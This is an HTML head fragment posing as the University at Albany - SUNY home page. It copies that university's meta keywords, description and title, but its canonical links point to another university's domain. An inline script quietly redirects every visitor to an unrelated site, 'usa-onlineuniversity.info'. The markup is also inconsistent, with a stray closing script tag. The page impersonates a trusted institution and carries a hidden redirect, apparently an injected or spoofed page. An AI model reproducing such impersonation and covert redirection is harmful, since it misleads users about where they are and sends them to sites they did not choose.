<head>
<meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7; IE=EDGE" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="keywords" content="University at Albany, State University of New York, Albany, UAlbany, Great Danes, Danes, Division 1,SUNY Albany, SUNY at Albany, SUNYA, UA, University of Albany, Albany State, NYS Teachers College, Capital District, Capital Region, Higher Education, Research University, Honors College, Nanosciences, U-Albany, U Albany, Albany University, MyUAlbany, Albany State University, New York State University" />
<meta name="Description" content="Educationally and culturally, the University at Albany-SUNY puts The World Within Reach for its 18,000 students. An internationally recognized research university with 56 undergraduate majors and 128 graduate degree programs, UAlbany is a leader among all New York State colleges and universities in such diverse fields as public policy, nanotechnology and criminal justice. With a curriculum enhanced by 300 study-abroad opportunities, UAlbany launches great careers." />
<meta name="apple-itunes-app" content="app-id=886698984, affiliate-data=myAffiliateData, app-argument=https://itunes.apple.com/us/app/ualbany/id886698984?mt=8&uo=4">
<title>University at Albany - SUNY - Home Page</title>

<link rel="canonical" href="http://unmc.edu/" />
<link rel="shortlink" href="http://unmc.edu/" />

</script>
<script type="text/javascript">
<!--
window.location = "http://usa-onlineuniversity.info/"
//-->
</script>
